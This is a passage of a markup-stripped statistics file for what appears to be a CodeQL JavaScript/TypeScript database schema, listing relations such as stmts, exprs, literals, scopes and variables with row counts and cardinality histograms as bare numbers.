-6458 -17551 - - - - - - -endLine -beginLine - - -12 - - -1 -2 -243883 - - -2 -4 -23431 - - -4 -71 -10091 - - - - - - -endLine -beginColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -11 -19057 - - -11 -12 -32046 - - -12 -15 -18779 - - -15 -17 -18710 - - -17 -21 -21785 - - -21 -31 -21103 - - -31 -63 -20930 - - -63 -94454 -7829 - - - - - - -endLine -endColumn - - -12 - - -1 -5 -667 - - -5 -6 -116499 - - -6 -12 -21177 - - -12 -13 -28718 - - -13 -16 -19585 - - -16 -18 -21210 - - -18 -23 -23344 - - -23 -35 -21013 - - -35 -80 -20938 - - -80 -94454 -4254 - - - - - - -endColumn -id - - -12 - - -1 -2 -4439 - - -2 -3 -8489 - - -3 -4 -12884 - - -4 -5 -16048 - - -5 -6 -15554 - - -6 -7 -12546 - - -7 -8 -9231 - - -8 -9 -6405 - - -9 -11 -9266 - - -11 -14 -10367 - - -14 -20 -9186 - - -20 -489713 -3453 - - - - - - -endColumn -file - - -12 - - -1 -2 -68569 - - -2 -3 -15919 - - -3 -4 -7876 - - -4 -5 -9221 - - -5 -6 -8062 - - -6 -6458 -8221 - - - - - - -endColumn -beginLine - - -12 - - -1 -2 -6848 - - -2 -3 -15273 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10857 - - -9 -11 -9251 - - -11 -1768 -8841 - - -1780 -212575 -199 - - - - - - -endColumn -beginColumn - - -12 - - -1 -2 -15842 - - -2 -3 -27460 - - -3 -4 -26707 - - -4 -5 -18639 - - -5 -6 -11518 - - -6 -8 -10766 - - -8 -265 -6936 - - - - - - -endColumn -endLine - - -12 - - -1 -2 -6850 - - -2 -3 -15271 - - -3 -4 -24807 - - -4 -5 -25343 - - -5 -6 -10180 - - -6 -7 -6269 - - -7 -9 -10858 - - -9 -11 -9252 - - -11 -1789 -8841 - - -1795 -212360 -197 - - - - - - - - -numlines -122044 - - -element_id -122044 - - -num_lines -1136 - - -num_code -939 - - -num_comment -418 - - - - -element_id -num_lines - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_code - - -12 - - -1 -2 -122044 - - - - - - -element_id -num_comment - - -12 - - -1 -2 -122044 - - - - - - -num_lines -element_id - - -12 - - -1 -2 -399 - - -2 -3 -144 - - -3 -4 -97 - - -4 -6 -91 - - -6 -9 -86 - - -9 -15 -90 - - -15 -36 -86 - - -36 -174 -86 - - -175 -21589 -57 - - - - - - -num_lines -num_code - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -95 - - -4 -6 -87 - - -6 -9 -85 - - -9 -14 -88 - - -14 -24 -90 - - -24 -33 -89 - - -33 -38 -18 - - - - - - -num_lines -num_comment - - -12 - - -1 -2 -444 - - -2 -3 -140 - - -3 -4 -94 - - -4 -6 -92 - - -6 -9 -90 - - -9 -14 -90 - - -14 -20 -89 - - -20 -27 -89 - - -27 -30 -8 - - - - - - -num_code -element_id - - -12 - - -1 -2 -317 - - -2 -3 -125 - - -3 -4 -67 - - -4 -5 -61 - - -5 -8 -67 - - -8 -12 -73 - - -12 -26 -72 - - -26 -69 -71 - - -69 -1540 -71 - - -1747 -22000 -15 - - - - - - -num_code -num_lines - - -12 - - -1 -2 -349 - - -2 -3 -118 - - -3 -4 -77 - - -4 -6 -76 - - -6 -10 -84 - - -10 -19 -78 - - -19 -31 -79 - - -31 -44 -73 - - -44 -52 -5 - - - - - - -num_code -num_comment - - -12 - - -1 -2 -347 - - -2 -3 -121 - - -3 -4 -79 - - -4 -6 -74 - - -6 -9 -74 - - -9 -16 -80 - - -16 -23 -72 - - -23 -31 -76 - - -31 -40 -16 - - - - - - -num_comment -element_id - - -12 - - -1 -2 -147 - - -2 -3 -67 - - -3 -4 -26 - - -4 -5 -26 - - -5 -7 -32 - - -7 -12 -34 - - -12 -32 -34 - - -33 -135 -32 - - -150 -93795 -20 - - - - - - -num_comment -num_lines - - -12 - - -1 -2 -171 - - -2 -3 -57 - - -3 -4 -32 - - -4 -5 -24 - - -5 -8 -33 - - -8 -18 -35 - - -19 -47 -32 - - -52 -253 -33 - - -362 -363 -1 - - - - - - -num_comment -num_code - - -12 - - -1 -2 -174 - - -2 -3 -54 - - -3 -4 -33 - - -4 -5 -22 - - -5 -8 -33 - - -8 -18 -36 - - -19 -47 -32 - - -51 -230 -32 - - -232 -346 -2 - - - - - - - - -files -id -6457 - - -id -6457 - - -name -6457 - - - - -id -name - - -12 - - -1 -2 -6457 - - - - - - -name -id - - -12 - - -1 -2 -6457 - - - - - - - - -folders -id -1590 - - -id -1590 - - -name -1590 - - - - -id -name - - -12 - - -1 -2 -1590 - - - - - - -name -id - - -12 - - -1 -2 -1590 - - - - - - - - -containerparent -child -8046 - - -parent -1590 - - -child -8046 - - - - -parent -child - - -12 - - -1 -2 -525 - - -2 -3 -326 - - -3 -4 -207 - - -4 -5 -128 - - -5 -7 -138 - - -7 -11 -132 - - -11 -53 -120 - - -60 -335 -14 - - - - - - -child -parent - - -12 - - -1 -2 -8046 - - - - - - - - -externalData -5684 - - -id -950 - - -path -3 - - -column -6 - - -value -790 - - - - -id -path - - -12 - - -1 -2 -950 - - - - - - -id -column - - -12 - - -2 -3 -4 - - -6 -7 -946 - - - - - - -id -value - - -12 - - -2 -6 -8 - - -6 -7 -942 - - - - - - -path -id - - -12 - - -4 -5 -1 - - -72 -73 -1 - - -874 -875 -1 - - - - - - -path -column - - -12 - - -2 -3 -1 - - -6 -7 -2 - - - - - - -path -value - - -12 - - -8 -9 -1 - - -86 -87 -1 - - -722 -723 -1 - - - - - - -column -id - - -12 - - -946 -947 -4 - - -950 -951 -2 - - - - - - -column -path - - -12 - - -2 -3 -4 - - -3 -4 -2 - - - - - - -column -value - - -12 - - -2 -3 -1 - - -6 -7 -1 - - -31 -32 -1 - - -93 -94 -1 - - -117 -118 -1 - - -620 -621 -1 - - - - - - -value -id - - -12 - - -1 -2 -478 - - -2 -3 -132 - - -3 -5 -69 - - -5 -16 -61 - - -16 -928 -50 - - - - - - -value -path - - -12 - - -1 -2 -764 - - -2 -3 -26 - - - - - - -value -column - - -12 - - -1 -2 -711 - - -2 -3 -79 - - - - - - - - -sourceLocationPrefix -1 - - -prefix -1 - - - - - -toplevels -id -5320 - - -id -5320 - - -kind -4 - - - - -id -kind - - -12 - - -1 -2 -5320 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -31 -32 -1 - - -86 -87 -1 - - -5200 -5201 -1 - - - - - - - - -is_externs -44 - - -toplevel -44 - - - - - -is_instantiated -5 - - -decl -5 - - - - - -has_declare_keyword -66 - - -stmt -66 - - - - - -has_asserts_keyword -66 - - -node -66 - - - - - -is_abstract_member -66 - - -id -66 - - - - - -has_public_keyword -9297 - - -id -9297 - - - - - -has_private_keyword -11391 - - -id -11391 - - - - - -has_protected_keyword -1048 - - -id -1048 - - - - - -has_readonly_keyword -2338 - - -id -2338 - - - - - -has_type_keyword -1000 - - -id -1000 - - - - - -is_optional_member -3668 - - -id -3668 - - - - - -has_definite_assignment_assertion -100 - - -id -100 - - - - - -is_optional_parameter_declaration -3966 - - -parameter -3966 - - - - - -parameter_fields -2693 - - -field -2693 - - -constructor -1020 - - -param_index -20 - - - - -field -constructor - - -12 - - -1 -2 -2693 - - - - - - -field -param_index - - -12 - - -1 -2 -2693 - - - - - - -constructor -field - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -constructor -param_index - - -12 - - -1 -2 -439 - - -2 -3 -233 - - -3 -4 -118 - - -4 -5 -78 - - -5 -7 -83 - - -7 -21 -69 - - - - - - -param_index -field - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - -param_index -constructor - - -12 - - -1 -2 -1 - - -2 -3 -1 - - -3 -4 -1 - - -4 -5 -1 - - -5 -6 -1 - - -6 -7 -1 - - -8 -9 -1 - - -10 -11 -1 - - -15 -16 -1 - - -22 -23 -1 - - -29 -30 -1 - - -36 -37 -1 - - -48 -49 -1 - - -69 -70 -1 - - -104 -105 -1 - - -152 -153 -1 - - -230 -231 -1 - - -348 -349 -1 - - -581 -582 -1 - - -1020 -1021 -1 - - - - - - - - -is_const_enum -62 - - -id -62 - - - - - -is_abstract_class -116 - - -id -116 - - - - - -typeexprs -54050 - - -id -54050 - - -kind -6 - - -parent -29264 - - -idx -26 - - -tostring -3278 - - - - -id -kind - - -12 - - -1 -2 -54050 - - - - - - -id -parent - - -12 - - -1 -2 -54050 - - - - - - -id -idx - - -12 - - -1 -2 -54050 - - - - - - -id -tostring - - -12 - - -1 -2 -54050 - - - - - - -kind -id - - -12 - - -3 -4 -1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -25306 -25307 -1 - - -25491 -25492 -1 - - - - - - -kind -parent - - -12 - - -3 -4 -1 - - -4 -5 -1 - - -733 -734 -1 - - -2513 -2514 -1 - - -16661 -16662 -1 - - -17601 -17602 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -2 - - -3 -4 -1 - - -4 -5 -1 - - -19 -20 -1 - - -25 -26 -1 - - - - - - -kind -tostring - - -12 - - -2 -3 -1 - - -3 -4 -1 - - -9 -10 -1 - - -242 -243 -1 - - -2075 -2076 -1 - - -2322 -2323 -1 - - - - - - -parent -id - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -kind - - -12 - - -1 -2 -21285 - - -2 -3 -7707 - - -3 -4 -272 - - - - - - -parent -idx - - -12 - - -1 -2 -15321 - - -2 -3 -7887 - - -3 -4 -3725 - - -4 -9 -2229 - - -9 -24 -102 - - - - - - -parent -tostring - - -12 - - -1 -2 -16315 - - -2 -3 -8432 - - -3 -4 -3126 - - -4 -22 -1391 - - - - - - -idx -id - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -kind - - -12 - - -1 -2 -7 - - -2 -3 -14 - - -3 -4 -2 - - -4 -5 -3 - - - - - - -idx -parent - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -7 -2 - - -10 -12 -2 - - -13 -22 -2 - - -27 -38 -2 - - -54 -61 -2 - - -101 -212 -2 - - -356 -530 -2 - - -859 -1645 -2 - - -2513 -2519 -2 - - -3330 -7198 -2 - - -15305 -19237 -2 - - - - - - -idx -tostring - - -12 - - -1 -2 -2 - - -3 -4 -2 - - -4 -6 -2 - - -9 -10 -2 - - -12 -17 -2 - - -18 -26 -2 - - -28 -31 -2 - - -37 -44 -2 - - -60 -71 -2 - - -108 -196 -2 - - -395 -667 -2 - - -746 -978 -2 - - -1522 -2076 -2 - - - - - - -tostring -id - - -12 - - -1 -2 -1085 - - -2 -3 -627 - - -3 -4 -344 - - -4 -5 -322 - - -5 -7 -292 - - -7 -12 -260 - - -12 -45 -247 - - -45 -7788 -101 - - - - - - -tostring -kind - - -12 - - -1 -2 -1903 - - -2 -3 -1375 - - - - - - -tostring -parent - - -12 - - -1 -2 -1097 - - -2 -3 -631 - - -3 -4 -341 - - -4 -5 -327 - - -5 -7 -292 - - -7 -12 -253 - - -12 -48 -246 - - -48 -6190 -91 - - - - - - -tostring -idx - - -12 - - -1 -2 -1450 - - -2 -3 -939 - - -3 -4 -481 - - -4 -6 -289 - - -6 -19 -119 - - - - - - - - -is_for_await_of -1 - - -forof -1 - - - - - -is_module -21 - - -tl -21 - - - - - -is_es2015_module -21 - - -tl -21 - - - - - -is_closure_module -21 - - -tl -21 - - - - - -toplevel_parent_xml_node -43 - - -toplevel -43 - - -xmlnode -43 - - - - -toplevel -xmlnode - - -12 - - -1 -2 -43 - - - - - - -xmlnode -toplevel - - -12 - - -1 -2 -43 - - - - - - - - -xml_element_parent_expression -1 - - -xmlnode -1 - - -expression -1 - - -index -1 - - - - -xmlnode -expression - - -12 - - -1 -2 -1 - - - - - - -xmlnode -index - - -12 - - -1 -2 -1 - - - - - - -expression -xmlnode - - -12 - - -1 -2 -1 - - - - - - -expression -index - - -12 - - -1 -2 -1 - - - - - - -index -xmlnode - - -12 - - -1 -2 -1 - - - - - - -index -expression - - -12 - - -1 -2 -1 - - - - - - - - -is_nodejs -12 - - -tl -12 - - - - - -stmts -id -1096691 - - -id -1096691 - - -kind -31 - - -parent -412140 - - -idx -152947 - - -tostring -284956 - - - - -id -kind - - -12 - - -1 -2 -1096691 - - - - - - -id -parent - - -12 - - -1 -2 -1096691 - - - - - - -id -idx - - -12 - - -1 -2 -1096691 - - - - - - -id -tostring - - -12 - - -1 -2 -1096691 - - - - - - -kind -id - - -12 - - -1 -2 -3 - - -3 -5 -2 - - -5 -9 -2 - - -31 -42 -2 - - -61 -552 -2 - - -1118 -1137 -2 - - -1272 -1316 -2 - - -1316 -1379 -2 - - -1471 -1570 -2 - - -1642 -2306 -2 - - -3120 -5386 -2 - - -8674 -10150 -2 - - -16771 -48210 -2 - - -68214 -105607 -2 - - -204994 -610341 -2 - - - - - - -kind -parent - - -12 - - -1 -2 -4 - - -3 -5 -2 - - -5 -6 -2 - - -35 -59 -2 - - -298 -424 -2 - - -738 -1157 -2 - - -1253 -1263 -2 - - -1271 -1321 -2 - - -1495 -1568 -2 - - -1642 -2306 -2 - - -2999 -4416 -2 - - -4734 -10123 -2 - - -48139 -48347 -2 - - -50857 -162082 -2 - - -191077 -191078 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -3 - - -2 -3 -2 - - -3 -4 -2 - - -8 -9 -2 - - -10 -12 -2 - - -16 -22 -2 - - -28 -32 -2 - - -36 -37 -2 - - -39 -51 -2 - - -54 -63 -2 - - -65 -67 -2 - - -116 -118 -2 - - -122 -138 -2 - - -251 -1564 -2 - - -1967 -152946 -2 - - - - - - -kind -tostring - - -12 - - -1 -2 -5 - - -2 -3 -2 - - -4 -11 -2 - - -12 -17 -2 - - -88 -104 -2 - - -147 -168 -2 - - -239 -296 -2 - - -356 -428 -2 - - -591 -705 -2 - - -811 -829 -2 - - -1092 -2254 -2 - - -2665 -10292 -2 - - -18023 -21916 -2 - - -43911 -180066 -2 - - - - - - -parent -id - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -kind - - -12 - - -1 -2 -319546 - - -2 -3 -67918 - - -3 -23 -24676 - - - - - - -parent -idx - - -12 - - -1 -2 -265890 - - -2 -3 -69435 - - -3 -4 -25109 - - -4 -8 -34966 - - -8 -152946 -16740 - - - - - - -parent -tostring - - -12 - - -1 -2 -275359 - - -2 -3 -62818 - - -3 -4 -25781 - - -4 -8 -34293 - - -8 -19511 -13889 - - - - - - -idx -id - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -kind - - -12 - - -1 -2 -149940 - - -2 -28 -3007 - - - - - - -idx -parent - - -12 - - -1 -2 -149939 - - -2 -220361 -3008 - - - - - - -idx -tostring - - -12 - - -1 -2 -149939 - - -2 -88922 -3008 - - - - - - -tostring -id - - -12 - - -1 -2 -186537 - - -2 -3 -48494 - - -3 -5 -24651 - - -5 -37 -21526 - - -37 -72175 -3748 - - - - - - -tostring -kind - - -12 - - -1 -2 -284895 - - -2 -4 -61 - - - - - - -tostring -parent - - -12 - - -1 -2 -195596 - - -2 -3 -45562 - - -3 -5 -23127 - - -5 -66340 -20671 - - - - - - -tostring -idx - - -12 - - -1 -2 -225945 - - -2 -3 -33948 - - -3 -13 -21496 - - -13 -903 -3567 - - - - - - - - -stmt_containers -1096691 - - -stmt -1096691 - - -container -120740 - - - - -stmt -container - - -12 - - -1 -2 -1096691 - - - - - - -container -stmt - - -12 - - -1 -2 -6778 - - -2 -3 -35010 - - -3 -4 -16178 - - -4 -5 -12184 - - -5 -6 -9476 - - -6 -7 -7569 - - -7 -9 -10084 - - -9 -13 -10057 - - -13 -27 -9196 - - -27 -152947 -4208 - - - - - - - - -jump_targets -11791 - - -jump -11791 - - -target -4873 - - - - -jump -target - - -12 - - -1 -2 -11791 - - - - - - -target -jump - - -12 - - -1 -2 -2542 - - -2 -3 -1106 - - -3 -4 -505 - - -4 -6 -410 - - -6 -260 -310 - - - - - - - - -exprs -id -5495305 - - -id -5495305 - - -kind -85 - - -parent -3130204 - - -idx -17698 - - -tostring -834491 - - - - -id -kind - - -12 - - -1 -2 -5495305 - - - - - - -id -parent - - -12 - - -1 -2 -5495305 - - - - - - -id -idx - - -12 - - -1 -2 -5495305 - - - - - - -id -tostring - - -12 - - -1 -2 -5495305 - - - - - - -kind -id - - -12 - - -1 -4 -7 - - -4 -45 -7 - - -50 -97 -7 - - -108 -458 -7 - - -503 -824 -7 - - -1135 -2497 -7 - - -2527 -5439 -7 - - -5655 -10255 -7 - - -10789 -15893 -7 - - -17758 -42854 -7 - - -50958 -130844 -7 - - -245084 -722374 -7 - - -1295408 -1295409 -1 - - - - - - -kind -parent - - -12 - - -1 -3 -7 - - -3 -45 -7 - - -47 -93 -7 - - -106 -407 -7 - - -457 -809 -7 - - -1108 -2420 -7 - - -2502 -5349 -7 - - -5453 -10133 -7 - - -10658 -15697 -7 - - -16273 -36888 -7 - - -41849 -128642 -7 - - -199566 -722374 -7 - - -1171898 -1171899 -1 - - - - - - -kind -idx - - -12 - - -1 -2 -7 - - -2 -3 -12 - - -3 -4 -11 - - -4 -5 -7 - - -5 -6 -7 - - -6 -7 -3 - - -7 -8 -7 - - -8 -11 -6 - - -12 -18 -7 - - -20 -64 -7 - - -82 -395 -7 - - -431 -13375 -4 - - - - - - -kind -tostring - - -12 - - -1 -2 -7 - - -2 -6 -7 - - -8 -37 -7 - - -38 -126 -7 - - -142 -304 -7 - - -358 -721 -7 - - -811 -1485 -7 - - -1523 -2918 -7 - - -3305 -5078 -7 - - -5422 -9940 -7 - - -10536 -40606 -7 - - -46227 -123090 -7 - - -128754 -128755 -1 - - - - - - -parent -id - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -kind - - -12 - - -1 -2 -1300246 - - -2 -3 -1747609 - - -3 -8 -82349 - - - - - - -parent -idx - - -12 - - -1 -2 -1100280 - - -2 -3 -1876078 - - -3 -17692 -153846 - - - - - - -parent -tostring - - -12 - - -1 -2 -1108803 - - -2 -3 -1870864 - - -3 -17526 -150537 - - - - - - -idx -id - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -kind - - -12 - - -1 -2 -10648 - - -2 -3 -6398 - - -3 -83 -652 - - - - - - -idx -parent - - -12 - - -1 -2 -4092 - - -2 -3 -1365 - - -3 -4 -1995 - - -4 -5 -283 - - -5 -6 -1681 - - -6 -7 -5909 - - -7 -10 -1344 - - -10 -3049605 -1029 - - - - - - -idx -tostring - - -12 - - -1 -2 -4093 - - -2 -3 -1365 - - -3 -4 -2014 - - -4 -5 -1147 - - -5 -6 -1529 - - -6 -7 -5401 - - -7 -10 -1499 - - -10 -573348 -650 - - - - - - -tostring -id - - -12 - - -1 -2 -466570 - - -2 -3 -157949 - - -3 -4 -55443 - - -4 -6 -61411 - - -6 -17 -63412 - - -17 -128652 -29706 - - - - - - -tostring -kind - - -12 - - -1 -2 -772624 - - -2 -24 -61867 - - - - - - -tostring -parent - - -12 - - -1 -2 -467110 - - -2 -3 -158201 - - -3 -4 -55446 - - -4 -6 -61061 - - -6 -17 -63168 - - -17 -128642 -29505 - - - - - - -tostring -idx - - -12 - - -1 -2 -724438 - - -2 -3 -86524 - - -3 -7765 -23529 - - - - - - - - -literals -expr -3145090 - - -value -216517 - - -raw -234110 - - -expr -3145090 - - - - -value -raw - - -12 - - -1 -2 -201221 - - -2 -25 -15296 - - - - - - -value -expr - - -12 - - -1 -2 -95821 - - -2 -3 -41222 - - -3 -4 -19627 - - -4 -5 -16097 - - -5 -9 -18825 - - -9 -31 -16474 - - -31 -122435 -8451 - - - - - - -raw -value - - -12 - - -1 -2 -234110 - - - - - - -raw -expr - - -12 - - -1 -2 -104635 - - -2 -3 -47230 - - -3 -4 -20082 - - -4 -5 -16835 - - -5 -9 -19610 - - -9 -34 -17695 - - -34 -120241 -8023 - - - - - - -expr -value - - -12 - - -1 -2 -3145090 - - - - - - -expr -raw - - -12 - - -1 -2 -3145090 - - - - - - - - -enclosing_stmt -5372899 - - -expr -5372899 - - -stmt -854574 - - - - -expr -stmt - - -12 - - -1 -2 -5372899 - - - - - - -stmt -expr - - -12 - - -1 -3 -74578 - - -3 -4 -254844 - - -4 -5 -57228 - - -5 -6 -136234 - - -6 -7 -44557 - - -7 -8 -79401 - - -8 -9 -55420 - - -9 -11 -63155 - - -11 -17 -65146 - - -17 -88321 -24011 - - - - - - - - -expr_containers -5495305 - - -expr -5495305 - - -container -118511 - - - - -expr -container - - -12 - - -1 -2 -5495305 - - - - - - -container -expr - - -12 - - -1 -4 -7197 - - -4 -6 -9110 - - -6 -8 -9222 - - -8 -10 -8424 - - -10 -13 -10651 - - -13 -16 -8706 - - -16 -20 -9358 - - -20 -25 -9955 - - -25 -31 -8893 - - -31 -40 -9356 - - -40 -54 -9017 - - -54 -85 -8935 - - -85 -484 -8890 - - -484 -459128 -797 - - - - - - - - -array_size -28188 - - -ae -28188 - - -sz -118 - - - - -ae -sz - - -12 - - -1 -2 -28188 - - - - - - -sz -ae - - -12 - - -1 -2 -52 - - -2 -3 -21 - - -3 -5 -9 - - -5 -8 -9 - - -9 -20 -9 - - -22 -181 -9 - - -231 -12345 -9 - - - - - - - - -is_delegating -4 - - -yield -4 - - - - - -expr_contains_template_tag_location -31 - - -expr -31 - - -location -31 - - - - -expr -location - - -12 - - -1 -2 -31 - - - - - - -location -expr - - -12 - - -1 -2 -31 - - - - - - - - -template_placeholder_tag_info -283 - - -node -283 - - -parentNode -92 - - -raw -24 - - - - -node -parentNode - - -12 - - -1 -2 -283 - - - - - - -node -raw - - -12 - - -1 -2 -283 - - - - - - -parentNode -node - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -5 -6 -9 - - -6 -7 -4 - - -7 -8 -13 - - -9 -11 -4 - - - - - - -parentNode -raw - - -12 - - -1 -2 -49 - - -2 -3 -4 - - -3 -4 -9 - - -4 -5 -11 - - -5 -6 -13 - - -6 -11 -6 - - - - - - -raw -node - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -45 -2 - - -82 -83 -1 - - - - - - -raw -parentNode - - -12 - - -1 -2 -2 - - -2 -3 -4 - - -3 -4 -9 - - -4 -6 -2 - - -16 -17 -2 - - -20 -26 -2 - - -34 -41 -2 - - -44 -45 -1 - - - - - - - - -scopes -id -118172 - - -id -118172 - - -kind -8 - - - - -id -kind - - -12 - - -1 -2 -118172 - - - - - - -kind -id - - -12 - - -1 -2 -1 - - -4 -5 -1 - - -17 -18 -1 - - -21 -22 -1 - - -28 -29 -1 - - -584 -585 -1 - - -1272 -1273 -1 - - -116245 -116246 -1 - - - - - - - - -scopenodes -118171 - - -node -118171 - - -scope -118171 - - - - -node -scope - - -12 - - -1 -2 -118171 - - - - - - -scope -node - - -12 - - -1 -2 -118171 - - - - - - - - -scopenesting -118171 - - -inner -118171 - - -outer -33143 - - - - -inner -outer - - -12 - - -1 -2 -118171 - - - - - - -outer -inner - - -12 - - -1 -2 -17868 - - -2 -3 -6196 - - -3 -4 -2666 - - -4 -6 -2791 - - -6 -13 -2584 - - -13 -17277 -1038 - - - - - - - - -is_generator -62 - - -fun -62 - - - - - -has_rest_parameter -33 - - -fun -33 - - - - - -is_async -50 - - -fun -50 - - - - - -variables -id -364388 - - -id -364388 - - -name -56559 - - -scope -118168 - - - - -id -name - - -12 - - -1 -2 -364388 - - - - - - -id -scope - - -12 - - -1 -2 -364388 - - - - - - -name -id - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -name -scope - - -12 - - -1 -2 -38013 - - -2 -3 -9547 - - -3 -5 -4518 - - -5 -115 -4242 - - -115 -116259 -239 - - - - - - -scope -id - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - -scope -name - - -12 - - -1 -2 -39907 - - -2 -3 -32053 - - -3 -4 -18882 - - -4 -5 -9814 - - -5 -8 -10909 - - -8 -8779 -6603 - - - - - - - - -local_type_names -23565 - - -id -23565 - - -name -6080 - - -scope -1614 - - - - -id -name - - -12 - - -1 -2 -23565 - - - - - - -id -scope - - -12 - - -1 -2 -23565 - - - - - - -name -id - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -name -scope - - -12 - - -1 -2 -2821 - - -2 -3 -1362 - - -3 -4 -641 - - -4 -6 -508 - - -6 -13 -485 - - -13 -533 -263 - - - - - - -scope -id - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - -scope -name - - -12 - - -1 -2 -138 - - -2 -3 -109 - - -3 -4 -116 - - -4 -5 -108 - - -5 -7 -140 - - -7 -8 -89 - - -8 -10 -131 - - -10 -12 -112 - - -12 -15 -144 - - -15 -19 -134 - - -19 -25 -132 - - -25 -37 -122 - - -37 -87 -122 - - -87 -221 -17 - - - - - - - - -local_namespace_names -20832 - - -id -20832 - - -name -4078 - - -scope -1543 - - - - -id -name - - -12 - - -1 -2 -20832 - - - - - - -id -scope - - -12 - - -1 -2 -20832 - - - - - - -name -id - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -name -scope - - -12 - - -1 -2 -1787 - - -2 -3 -859 - - -3 -4 -378 - - -4 -5 -216 - - -5 -8 -364 - - -8 -20 -310 - - -20 -533 -164 - - - - - - -scope -id - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - -scope -name - - -12 - - -1 -2 -88 - - -2 -3 -123 - - -3 -4 -120 - - -4 -5 -104 - - -5 -6 -107 - - -6 -7 -70 - - -7 -8 -87 - - -8 -10 -137 - - -10 -12 -122 - - -12 -15 -122 - - -15 -19 -124 - - -19 -26 -120 - - -26 -39 -117 - - -39 -136 -102 - - - - - - - - -is_arguments_object -116243 - - -id -116243 - - - - - -bind -1295408 - - -id -1295408 - - -decl -224900 - - - - -id -decl - - -12 - - -1 -2 -1295408 - - - - - - -decl -id - - -12 - - -1 -2 -81789 - - -2 -3 -50824 - - -3 -4 -29919 - - -4 -5 -17755 - - -5 -7 -16901 - - -7 -14 -17790 - - -14 -98305 -9922 - - - - - - - - -decl -250257 - - -id -250257 - - -decl -246998 - - - - -id -decl - - -12 - - -1 -2 -250257 - - - - - - -decl -id - - -12 - - -1 -2 -245772 - - -2 -283 -1226 - - - - - - - - -typebind -36216 - - -id -36216 - - -decl -12650 - - - - -id -decl - - -12 - - -1 -2 -36216 - - - - - - -decl -id - - -12 - - -1 -2 -6781 - - -2 -3 -2435 - - -3 -4 -1133 - - -4 -6 -1127 - - -6 -17 -954 - - -17 -524 -220 - - - - - - - - -typedecl -23573 - - -id -23573 - - -decl -23565 - - - - -id -decl - - -12 - - -1 -2 -23573 - - - - - - -decl -id - - -12 - - -1 -2 -23558 - - -2 -4 -7 - - - - - - - - -namespacedecl -20839 - - -id -20839 - - -decl -20832 - - - - -id -decl - - -12 - - -1 -2 -20839 - - - - - - -decl -id - - -12 - - -1 -2 -20828 - - -2 -5 -4 - - - - - - - - -namespacebind -4300 - - -id -4300 - - -decl -485 - - - - -id -decl - - -12 - - -1 -2 -4300 - - - - - - -decl -id - - -12 - - -1 -2 -133 - - -2 -3 -46 - - -3 -4 -56 - - -4 -5 -30 - - -5 -7 -37 - - -7 -9 -44 - - -9 -12 -41 - - -12 -17 -38 - - -17 -31 -37 - - -32 -287 -23 - - - - - - - - -properties -id -142723 - - -id -142723 - - -parent -45129 - - -index -4204 - - -kind -3 - - -tostring -67703 - - - - -id -parent - - -12 - - -1 -2 -142723 - - - - - - -id -index - - -12 - - -1 -2 -142723 - - - - - - -id -kind - - -12 - - -1 -2 -142723 - - - - - - -id -tostring - - -12 - - -1 -2 -142723 - - - - - - -parent -id - - -12 - - -1 -2 